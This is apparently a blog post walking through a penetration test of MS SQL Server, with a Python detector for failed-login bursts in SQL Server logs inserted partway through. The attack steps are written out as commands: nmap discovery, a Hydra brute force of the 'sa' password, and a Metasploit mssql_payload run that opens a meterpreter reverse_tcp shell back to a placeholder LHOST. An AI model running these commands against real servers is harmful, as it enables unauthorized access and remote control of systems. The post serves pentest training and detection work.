Friday, August 7, 2020

[ICSI_CPT] A walkthrough of a pentest against MS SQL Server

First, confirm whether MS SQL Server is listening on its default port (TCP 1433).

# nmap -Pn -sS -p 1433 192.168.0.25


After that, try to ascertain the details of the MS SQL Server instance (version, instance name, and the authentication mode it accepts).

# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25


Once the details of the authentication mode are known, Hydra can be used to brute-force the password of the sa account.

# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt 192.168.0.25 mssql
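The defender-side counterpart to the step above, added here and not part of the original walkthrough: a small detector that reads SQL Server ERRORLOG login lines and flags a burst of failed logins for one user from one client, noting whether a successful login from that client followed (the sign that the brute force worked). The log excerpt is constructed, and the login-line format, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches SQL Server ERRORLOG "Login failed"/"Login succeeded" lines (format assumed, see sample below).
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']+)'.*"
    r"\[CLIENT: (?P<client>[\d.]+)\]"
)

def parse_login_events(lines):
    """Yield (timestamp, outcome, user, client) for each login line; other lines are skipped."""
    for line in lines:
        m = LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["outcome"], m["user"], m["client"]

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (client, user) pairs with >= threshold failures inside a sliding window,
    and record whether a successful login from the same client/user came afterwards."""
    failures = defaultdict(list)   # (client, user) -> timestamps of recent failures
    alerts = {}
    for ts, outcome, user, client in parse_login_events(lines):
        key = (client, user)
        if outcome == "failed":
            failures[key].append(ts)
            failures[key] = [t for t in failures[key] if ts - t <= window]  # drop old failures
            if len(failures[key]) >= threshold:
                alert = alerts.setdefault(key, {"client": client, "user": user,
                                                "failures": 0, "succeeded_after": False})
                alert["failures"] = len(failures[key])
        elif key in alerts:
            alerts[key]["succeeded_after"] = True   # guessing very likely succeeded
    return list(alerts.values())

# Constructed sample ERRORLOG excerpt: six password failures for 'sa' within 10 s, then a success.
SAMPLE_LOG = [
    f"2020-08-07 10:15:{s:02d}.10 Logon       Login failed for user 'sa'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 192.168.0.10]"
    for s in range(1, 7)
] + [
    "2020-08-07 10:15:08.00 Logon       Error: 18456, Severity: 14, State: 8.",
    "2020-08-07 10:15:09.50 Logon       Login succeeded for user 'sa'. "
    "Connection made using SQL Server authentication. [CLIENT: 192.168.0.10]",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Successful logins only appear in the ERRORLOG when the server's login auditing is set to log both failed and successful logins, so the `succeeded_after` flag depends on that setting.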


With the recovered credentials, Metasploit completes the final exploitation step:

# msfconsole

msf > use exploit/windows/mssql/mssql_payload

msf > set payload windows/meterpreter/reverse_tcp

msf > set LHOST XXX.XXX.XXX.XXX

msf > set RHOST XXX.XXX.XXX.XXX

msf > set USERNAME sa

msf > set PASSWORD XXXXX

msf > run
